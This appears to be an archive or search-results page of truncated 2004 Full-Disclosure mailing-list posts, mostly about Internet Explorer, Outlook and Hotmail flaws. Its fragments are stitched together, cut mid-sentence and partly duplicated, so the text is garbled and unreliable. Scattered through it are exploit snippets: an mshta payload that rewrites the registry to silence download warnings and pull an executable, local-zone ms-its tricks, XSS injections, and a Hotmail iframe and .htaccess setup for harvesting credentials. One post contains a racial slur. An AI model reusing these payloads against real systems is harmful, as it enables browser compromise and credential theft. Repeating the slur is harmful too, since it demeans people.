!--
Can somebody tell me what is this?
http://131.215.133.210/view/index.shtml?videos=one
--
It looks like a live web cam [from: http://www.axis.com/index.htm] running
on someone's machine at caltech.edu trying to install a signed .cab named
Axis Media Control from Axis Communications
to
be released, screenshots and a demo movie are available. (A pre-beta
version is available for those willing to help and PROVIDE FEEDBACK!).
Cheers,
Loni
[EMAIL PROTECTED]
http://www.securityforest.com
___
Full-Disclosure - We believe in it.
Charter: http
http://slackware.com/lists/ provides security update lists,
The patches can be found in the /patches dir of the version
you're running, including slackware-current.
Colin
Carlos de Oliveira wrote:
Hi there!
I've seen linux distributions sometimes posting here on
full-disclosure its security
efforts to fully serve the profession
and future ISSAF releases. The feedback form is given at the end of ISSAF;
please email your feedback at [EMAIL PROTECTED] We will get back to you ASAP.
Best regards,
A.D. Moore
Friday, December 10, 2004
Internet Explorer 6 on the gadget commonly known as Windows XP SP2 enjoys
a fairly robust popup blocker.
This little 'thing' has been a major irritation to date. Nothing gets past
it until now. Chatter exists that some sites have defeated it on the
causal
Couldn't agree more, their concern isn't security, but
survival of the business model.
By providing a what you proposed would be a threat to their
profitable model as so
eloquently pointed out by Valdis and many others time and
time again.
-cm
[EMAIL PROTECTED] wrote:
On Mon, 06 Dec 2004 19:29
that this has probably been fixed in various ways, but I have
old Unixes for just such occasions.
Dave Morgan
David S. Morgan CISSP, CCNP
aka: [EMAIL PROTECTED]
When the winds of change blow hard enough, even the most tiny object
can become a deadly projectile
Monday, November 22, 2004
Thoroughly enjoying the usage of the various electronic greeting cards
going way back when to the days of Blue Mountain, today when the need has
arisen to make usage, horror has been replaced enjoyment by noticing an
ever increasing dwindling of the free cards. To
Since we're going the whole nine yards here, let's toss in the following
as well:
1. This will of course give a different reading in the status bar
2. More importantly it will bypass the so-called 'popup blocker' in IE XP
SP2
It's a hand-made Excel spreadsheet using OWC11 for Office 2003.
Tuesday, October 19, 2004
The following technical exercise demonstrates the enormously
elaborate methods required to defeat the current [as of today's
date] security mechanisms in place in both Microsoft Windows XP
SP2 and Internet Explorer 6.00 SP2 fully
patched:
It is by no means easy.
On Sat, 16 Oct 2004 19:13:18 -0700, Etaoin Shrdlu [EMAIL PROTECTED] wrote:
Of course, anyone still using the term hax0r as though it were
meaningful might want to think further about what a security
professional might be
A security professional is someone who cares more about money than
On Sun, 17 Oct 2004 12:34:33 -0500, Todd Towles
[EMAIL PROTECTED] wrote:
I agree with your idea, but I am one of those uni graduate/20 something
professionals. I am very passionate about my work and the security of the
company I work for. I work in a rural state and the money isn't as high
!--
It has recently come to my attention that it is possible to
circumvent functions inside of Microsoft Outlook 2003 and some
other MUA's by using href tags containing cid:;. By default
such MUAs no longer download web referenced images and objects,
however images referenced by cid:;
Yahoo! is the lamest network online corp wise. The queuing up of
security reports and the priority of them is all wrong, me thinks they
are a tad under staffed
I can access admin areaz of Yahoo!, I have various screenshots to prove it.
I gave up contacting Yahoo! after they failed to be
Should Full-Disclosure only allow so-called -real- names? I was on
Nanog (a network admin list) and they have a rule where you can only
post with a first and second name, instead of an alias or nick, to
kind of give more credibility that you are a security professional and
not a hax0r or script
Reverse Engineering the First Pocket PC Trojan
Airscanner Corp. has published a new tutorial on Reverse Engineering
the First Pocket PC Trojan:
http://www.informit.com/articles/article.asp?p=340544
This tutorial shows you how to reverse engineer a new example of Windows
Mobile malware - step by
Surely the threat of Take no Prisoners! is enough to scare anyone off, Harry.
On Fri, 08 Oct 2004 14:09:26 -0400, Harry Hoffman
[EMAIL PROTECTED] wrote:
Umm, should the Paladin of Security have weak locks? ;-)
Compute Fair, Compute Fun, Compute secure
Jan Clairmont Paladin
://airscanner.com/
[EMAIL PROTECTED]
Contributors:
Cyrus Peikari
Seth Fogie
Ratter/29A
Jonathan Read
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
!--
Alla Bezroutchko wrote:
Also interesting that they don't use
a {behavior:url(#default#AnchorClick);}
in this exploit which seems to be an essential part of http-
equiv's and
mikx's exploits.
The key to all these exploits is drag'n'drop access to a local
directory.
Since WinXP SP2
!--
The premise behind this Drag'n'Drop exploit is two-fold, one is
the ability to open a window with local content and the other is
the fact that dropping an IMG element will pass its DYNSRC
attribute instead of its SRC attribute
--
This is amusing. Though you're not the first to conjur
Application: NtRegmon (http://www.sysinternals.com/ntw2k/source/regmon.shtml)
Date: 14/Aug/2004
Status: Patched version available (6.12).
Platform(s): Windows OSs.
Author: Fermín J. Serna [EMAIL PROTECTED]
Location: http://www.ngsec.com/docs/advisories/NGSEC-2004-7.txt
Let's commence by giving credit where credit is due. The
thinking is that the manufacturer of Windows XP has done a
splendid job in patching their little operating system with 300
million dollars' worth of fixes. This is not exactly 'pocket
change'.
But this is:
1. trivial scripting in the
Internet Explorer supports a fantastic variety of styles
and behaviors amongst other 'unique capabilities'. A lovely
demonstration of that can be found here:
http://www.malware.com/wottapoop.html
--
http://www.malware.com
: IPD up to 1.4 (http://www.pedestalsoftware.com/)
Date: 14/Aug/2004
Status: Vendor contacted on 14/Aug/2004.
Platform(s): Windows OSs.
Author: Fermín J. Serna [EMAIL PROTECTED]
Location: http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt
Overview
Mr Johnson,
We have made available a paper containing several (unpublished by
iDefense's paper) tests against PAX-like solutions in WIN32. Only
tests, not deep information on how these products work.
Grab it at: [264 KB]
Recently Idefense has made public the whitepaper[1] called A
Comparison of Buffer Overflow Prevention Implementations and
Weaknesses.
Having reviewed this whitepaper we want to say it makes an inappropriate
comparison on the windows protections, especially with our product
StackDefender[2]
Randal, Phil wrote:
I have to agree with Todd, the naming convention is now right
useless for the normal population and make keeping up with
viruses on a corporate level that much harder. AV companies
are always trying to beat the other company and this leads to
very little information sharing
send it to [EMAIL PROTECTED]
They will forward your mail to the responsible people!
I did it the same way, and had a response within some hours!
/oliver
Jedi/Sector One wrote:
On Fri, Aug 06, 2004 at 05:11:19PM -0400, Michael Scheidell wrote:
Have a vulnerability in an IBM product.
sent alert
: Vulnerability Reported to:
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
- [EMAIL PROTECTED]
* July 9 (Two Hours Later): SuSE's Roman Drahtmueller responds
* July 9: Per SuSE request, issue forwarded to [EMAIL PROTECTED]
* July 19: Initial date set
VX Dude wrote:
named exploits are useful for finding out what's
inside a named.conf even in chroot jails.
- 2 cents
--- Paul Schmehl [EMAIL PROTECTED] wrote:
Can this be done?
Conditions:
1) You know an IP address that is running a DNS
server. (IOW, it responds
to digs.)
2) You do not know
Xitami Imatix testssi.ssi XSS
=
Xitami is an easy to use and open source webserver, running on several
platforms.
What?
=
Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which
delivers
a website with the content of several SSI-variables.
Within the
Daniel Neugebauer wrote:
Hi!
and wtf is an SEK and can I buy a cup of coffee with
that?
It's the Swedish currency:
http://en.wikipedia.org/wiki/Krona
Exchanged that would be 108,70 EUR or 134,56 US-Dollar. That's not
much for a challenge, is it? ;)
Bye,
Daniel
!--
Maybe the dark hearted criminals have de-faced the mi2g
website?
--
maybe light hearted ones can too. Stick this in the search thing
on the main page. Pretty sad:
''img dynsrc=javascript:document.write
('brbrcenterbfont size=24cmall your digital risk base
belong to
http://www.malware.com/wattadrag.html
--
http://www.malware.com
Paul has posted a tantalizing demonstration to bugtraq today.
[see: http://www.securityfocus.com/archive/1/368652]
This Internet Explorer sure provides hours of free
entertainment. Let's install and run executable code on the
target computers for the hell of it. Paul's beautiful demo
!--
Ctrl+clicking a shell:windows\\notepad.exe link in Microsoft
Word 10.2627.3311 launches Notepad.
--
this can be very interesting. The same in Outlook 2003 both html
and rich text. Good thing the named temp file deposits were
magically patched.
As Andreas Sandblad mentioned the
!--
I'm also really curious how this could be exploited.
--
What do you mean: I'm also really curious how this could be
exploited.
it's already been exploited, it was all over the news and
security lists a few months ago.
What is this: eWEEK.com Security Center Editor Is someone
!--
Every bit of real testing I've seen shows this is not a real
vulnerability in IE.
--
surely you jest.
It is the Key to the Kingdom. To quote the original finder, way
back in June of 2003:
allows remote attacker to traverse Shell Folders directories.
A remote attacker is able to
!--
No reason to set the kill bit?
Take a look at
http://seclists.org/lists/fulldisclosure/2004/Jun/0318.html
And I am quoting you now
You should be able to use this to compromise Windows XP SP2
through Internet Explorer despite the My Computer zone hardening
since the Trusted Sites Zone
This is IHCTEAM material. We fuck blackhats and we own the planet.
This is a leet advisory, s0 l33t. Just read it and be quiet.
---
IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr. [EMAIL
PROTECTED]
Product: PHP
Version: all
Security
?
=;^)
On or about 2004.07.02 02:52:05 +, [EMAIL PROTECTED]
([EMAIL PROTECTED]) said:
Hey how nice, WindowsUpdate/WellsFargo magically appeared in
front of
me and I didn't even intend to go there .. I was just surfing
for porn
.. Let me hurriedly download some stuff from there and give it
my
account
!--
The real fault doesn't belong with individual components
(ADODB.Stream included), and I think the almost rant-like posts
of Drew Copeley and HTTP-EQUIV miss this fact. ADODB.Stream
does *not* represent a vulnerability, although it does act to
significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It's
still have to contend with mshta.exe calling out through the
iframe and more than likely firewalled long ago, so use it to
write the registry to kill the download warning, then use it set
the browser home page as http://www/foo.exe, that or the
default search engine.
tons of
browsers are not affected:
* Mozilla Firefox 0.9 for Windows
* Mozilla Firefox 0.9.1 for Windows
* Mozilla 1.7 for Windows
* Mozilla 1.7 for Linux
http://secunia.com/advisories/11978/
Perhaps someone who really knows will enlighten us all.
Thor Larholm [EMAIL PROTECTED] said:
From: [EMAIL
about that, others...well...you know.
Thor Larholm [EMAIL PROTECTED] said:
Both you and I know perfectly well that Windows Update serves a
different page for non-IE browsers, and that that page does
not contain
any frames. You should focus on the facts instead of letting
your hatred
What an utterly pathetic scenario you present. Obviously you're
blissfully unaware of the current security trend of site
spoofing, 'phishing', url spoofing, DNS spoofing, zone spoofing
and on and on and on.
and of course now very the latest 'security expert spoofing' !
!--
Your subject
On the subject of IE bugs, I am running SP2 RC2,
IE6.0.2900.2149 today I
opened a window
http://www.asus.com/products/server/srv-mb/ncch-dl/overview.htm
In another IE window I had www.ingrammicro.com/uk open
When I click on the picture of the motherboard in the first
page to enlarge
Here's a quick and dirty demo injecting malware.com into
windowsupdate.microsoft.com :)
http://www.malware.com/targutted.html
Thomas Kessler was kind enough to inform that this is not new,
but in fact an old issue with Internet Explorer which by all
accounts was supposed to be patched back
With the current (in)security of most (if not all) ISP
that provide ASP.Net or ASP Classic shared hosting
services, all the attackers need to do is to get a
hosting account in a shared hosting server (trivial)
and infect these websites from the inside.
I haven't heard of any new IIS exploit
Where is Microsoft now protecting their customers as they love
to bray? Should not someone in authority of this public company
step forward and explain themselves at this time?
All of a sudden panic is being created across the WWW with IIS
Exploit Infecting Web Site Visitors With Malware,
volunteer as an expert witness when the negligence lawsuits
finally arise :)
and you?
Burnes, James [EMAIL PROTECTED] said:
One word,
m-o-n-o-p-o-l-y
And what are you going to do about it, punk?
-Original Message-
From: [EMAIL PROTECTED] [mailto:full-
disclosure
ktabic wrote:
On Tue, 2004-06-22 at 15:42 -0400, joe wrote:
ActiveX/OLE/COM is, again, not core Windows. They are applications that run
on Windows. The default user interfaces on the system use these for
management of the system and they are heavily embedded in several user faced
applications
There are several ways to search for vulnerabilities in applications.
If you have the sourcecode, you can do a code review. There are many
tools (like flawfinder etc.) which will support you in finding static
vulnerabilities like
buffer-overflows due to incorrect usage of commands like strcpy and
Well they can't get a simple thing like a mail client right,
they can't get a semi-simple thing like a browser right, they
can't get not-so-simple thing like an operating system right, so
let's branch out and fuck up some other things.
No doubt a few years from now you'll see a line of food
Tuesday, June 12, 2004
The following courtesy of 'bitlance winter' adds an entirely new
dimension to the matter and also suggests some additional
peculiarities at play:
a href='http://quot;gt;lt;plaintextgt;.e-gold.com'foo/a
a href='http://quot;gt;lt;scriptgt;alert()lt;%
james edwards wrote:
I've just been told that it was a DoS. No details.
Unlikely, Akamai is an overlay network the root content node is not
reachable.
Akamai can in real time spread web traffic through out their global network
of
servers, diluting a DoS to the point it is not significant. It is
This is all incorrect.
1. Any unusual characters in a file name will automatically be
converted to random digits. This has been tested and
demonstrated since 2001.
2. 'Save target' and an invoked download whether automatic or
manually cannot be the same. Simple logic right click on a
15MB
There is a sneaking suspicion that you can put the site contents
in the so-called 'local zone' or 'my computer'.
Since it validates the 'front end' of the address and ends up at
the 'back end' this all would seem very similar to:
object data=ms-its:mhtml:file://C:foo.mhtml!
!--
http://zdnet.com.com/2100-1105-5229707.html
http://news.com.com/2100-1002_3-5229707.html
IE flaws used to spread pop-up toolbar
by Robert Lemos, CNET News, 09 June 2004
The possibility that a group or company has apparently used the
vulnerabilities as a way to sneak unwanted advertising
Thursday, June 10, 2004
The following was presented by 'bitlance winter' of Japan today:
a href=http://www.microsoft.com%2F redir=www.e-
gold.comtest/a
Quite inexplicable from these quarters. Perhaps someone with
server 'knowledge' can examine it.
It carries over the address into the
Let me add some notes to this:
1. Placing microsoft.com in the so-called 'trusted zone', will
render the site contents of e-gold.com in the 'trusted zone'
2. Opera fails, Mozilla functions
3. While it may appear to be related to the html form, the same
can be achieved with a normal href or
From the original discover, 'bitlance winter' one big fat
coelacanth:
a href=http://www.malware.com%2F redir=www.e-gold.comtest/a
i guess that this issue is not e-gold's BUG,
IE6 and Opera7.51 is vulnerable.
Some server's DNS allow magic number subdomainname.
the server allow ,
www.site.tld
We wrap this up with a full-on ssl site spoof. It seems limited
how far you can 'shove' the real domain out of the way, but just
enough to make it convincing so we adapt the window to 'cover'
it up. Interestingly [with apologies to e-gold for playing with
their site], they have a secured
Who exactly are you?
You come barreling into FD several months ago, long after it was
created. Pissing in your pants to have found an unmoderated new
mailing list. You run around on a spree posting every piece of
drivel at every possible opportunity. You then latch onto
bugtraq riding the
Monday, June 07, 2004
!--
1. When the product alerts it creates an html file in the
temporary file of the user's machine [the so-called local zone]
[screen shot: http://www.malware.com/weallcar.png 29KB ]
This html file is viewed from an Internet Explorer browser
object and
indicates
!--
I hope I provided you with information to re-think your claims.
--
Is that so?
You and your friend provide nothing. Never have. Never will.
You and he ought remain in the peanut gallery and let doers do.
Sit back keep your mouth shut and learn from people who do.
Or create yet
a suitable name with suitable
html tags to render as we require. At present the actual browser
and operating system automatically filter this {script.com
becomes _script_.com].
3. We need a container to achieve this and do so like this:
ph03n1x wrote:
Hello
I'm kinda new to this list and this is my first post so be nice to me :)
Well I got an Intrusion Detection and Prevention System from a quite
famous company which they lend me for betatesting. I already compiled a
few exploits to test and it detected them quite reliably.
Pathetic.
Since you can spoof the main log in site all security calls to
check for the 'little' padlock icon to determine the site is
real doesn't exist on it plus the site has cross-site scripting
capabilities:
http://chase.com/inetSearch/index.jsp?
Anyone on this list have a rogers cable modem connection want
to do a quick test of something, drop me a note.
--
http://www.malware.com
Wednesday, May 26, 2004
Many people dismiss the dangers of cross site scripting as
nothing more than 'parlor tricks'. This is not a good idea. As
previously indicated:
[see: http://www.securityfocus.com/archive/1/348363]
when the right circumstance arises, this puny 'parlor trick' can
What kind of rinky-dink operation is this?
Hosted on geocities? Do you suppose they took the $11.95 per
month or the $19.95 or made a big splash and went for the $39.95
per month special. A whopping $25 saving setup fee too.
Broken links everywhere, script errors everywhere, missing
images.
Phriday , May 21, 2004
Several pheeble yet interesting phishing possibilities arise as
phollows:
Take one .htaccess trivially modified to suit the target
scenario:
AuthName EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN
AuthType Basic
One throw-away domain which can include the target's
Georgi Guninski wrote:
On Sun, May 16, 2004 at 12:19:21PM -0700, [EMAIL PROTECTED] wrote:
The MS operating systems are the main source of problems for really only
2 reasons:
1) their popularity makes them the most valuable targets
i suggest you stop smoking bad stuff, it is illegal in bulgaria
hi folks,
i played around with ActiveState's ActivePerl for Win32, and crashed
Perl.exe with the following command:
perl -e $a=A x 256; system($a)
I wonder if this bug isn't known?!? Because system() is a very common
command
Can anybody reproduce this?
I put together a little advisory on my
hi folks,
i played around with ActiveState's ActivePerl for Win32, and crashed
Perl.exe with the following command:
perl -e $a=A x 256; system($a)
I wonder if this bug isn't known?!? Because system() is a very common
command
Can anybody reproduce this?
I discovered this vulnerability
Monday, May 17, 2004
Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email' this can be achieved with the highly
touted 'secure-by-default' Outlook 2003 mail client from the
craftsman known as
Seth Alan Woolley wrote:
On Sat, May 15, 2004 at 08:31:25PM -0400, Shane C. Hage wrote:
Why should Microsoft have more blame?
In my opinion, I believe that software companies, especially Microsoft, have
taken all of the appropriate steps to provide security within their
products.
Keep your head
Thursday, May 13, 2004
The following is exceptionally unusual. For many years post
Outlook Express 4 has been an impossibility to target html or
remote sites directly into the 'window' of an Outlook Express
mail message. That means all links [your basic href] would
invoke the browser
Tuesday, May 11, 2004
Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it. Cursory examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'.
Sunday, May 09, 2004
Outlook 2003 the premier mail client from the company
called 'Microsoft' certainly appears to have a lot of security
features built into it. Cursory examination shows excellent
thought into 'spam' containment, 'security' consideration and
many other little 'things'.
Saturday, May 08, 2004
More silliness :
A HREF=http://www.microsoft.com alt=http://www.microsoft.com;
IMG SRC=malware.gif USEMAP=#malware border=0
alt=http://www.microsoft.com;/A
map NAME=malware alt=http://www.microsoft.com;
area SHAPE=RECT COORDS=224,21 HREF=http://www.malware.com;
as everyone could imagine, it's just another lame fake advisory of those
non-skilled bugtraq.org guys.
they always open their mouths very wide.
in former times it was funny to see their mails to mailinglists like bugtraq or
full-disclosure, but nowadays i can just bemoan these lame guys.
!-- This advisory below however is not from Microsoft,--
it is an 'official' Microsoft alert though :(
news://news.microsoft.com/[EMAIL PROTECTED]
not that anyone really cares :)
--
http://www.malware.com
!--
I thought you were already aware of the text/x-scriptlet
object variation of Ibiza which was exploited in the wild before
Ibiza
was even discussed on Bugtraq
--
Really? I be most interested in seeing a reference to that. The
time-line I have is:
1. On Wednesday, February 11, 2004
attacker with access to Monit's WBA via HTTP or HTTPS clients
could potentially gain the privileges of the root user.
V. Vendor Response
April 3, 2004:
* First two vulnerabilities discovered
* Monit team notified via e-mail ([EMAIL PROTECTED])
April 4, 2004:
* Response from Jan Henrik
Someone's thinking [for once].
tehaa = 'ADO' + 'DB' + '.St' + 'ream';
var tehf = new ActiveXObject(tehaa);
--
http://www.malware.com
!--
afaik, i can stop ie 0day exploits by doing these things.
so, i made this:
http://umbrella.name/winblox/
of course, free.
--
This is fantastic. A truly useful effort for the benefit of the
so-called security community. And free. And from security
expert who actually finds new and
!--
GET / HTTP/1.1
HTTP/1.1 200 OK
Server: My Bitchin' IE Infector
Date: Sat Mar 27 13:22:27 2004
Content-type: text/html
Accept-Encoding: identity
Accept-ranges: bytes
snip content
--
reinsert content
object data=ms-its:mhtml:file://C:foo.mhtml!
Dear Lists,
I have completed an analysis of the 'Witty' worm that impacts multiple ISS
products. The worm is spreading via a very simple UDP propagation
algorithm. The unique nature of this worm made it a fascinating piece of
code to analyze. The analysis gets into the details of the worm's
Dear Lists,
I have had an incredible surge in demand following my recent post of the
analysis of the 'Witty' worm. Initially, some of you were able to access
it now, but most of you were not. For those of you who were not able to
obtain a copy, a mirror has been made available. Tremaine Lea
!--
Joe just posted a URL with an analysis:
http://www.lurhq.com/witty.html
--
Certainly there is nothing like an 'early warning HUMAN system'
but really, how about letting the authors of their own work
make these announcements. There appears to be a new trend of
coat-tail riders
...then you're a lazy incompetent fake security fuck waiting
around for the house nigger to serve you your gin and tonic
while you sit on the stoep sipping your gin and tonic.
Mike Barushok [EMAIL PROTECTED] said:
Hmm, seems a little hypocritical to call for only the
author to announce
Thursday, March 18, 2004
Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted buddy.
In order to gain your little pal's credentials, simply send
him or her an email with an extra long subject like so:
=iframe
src=http://www.bloatedcorp.com
input type=hidden name=Biz.Email1
value=[EMAIL PROTECTED]
input type=hidden name=Biz.Email2 value=
input type=hidden name=Biz.Email3 value=
input type=hidden name=Biz.IM value=
input type=hidden name=Biz.WebPage value=
He had taken our entire contact list
1 - 100 of 178 matches